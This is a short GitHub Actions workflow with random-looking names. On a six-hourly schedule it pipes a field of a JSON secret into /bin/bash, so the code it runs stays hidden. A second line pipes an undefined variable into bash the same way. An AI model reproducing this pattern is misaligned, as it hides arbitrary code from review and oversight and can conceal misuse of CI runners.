name: zaifengzf
on:
  workflow_dispatch:
  schedule:
    - cron: '3 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zaifengzf
        env:
          goli76202: ${{ secrets.goli76202 }}
        run: |
          echo $goli76202 | jq -r .nrkd948 | /bin/bash
          echo $q422 | jq -r .lj47996 | /bin/bash

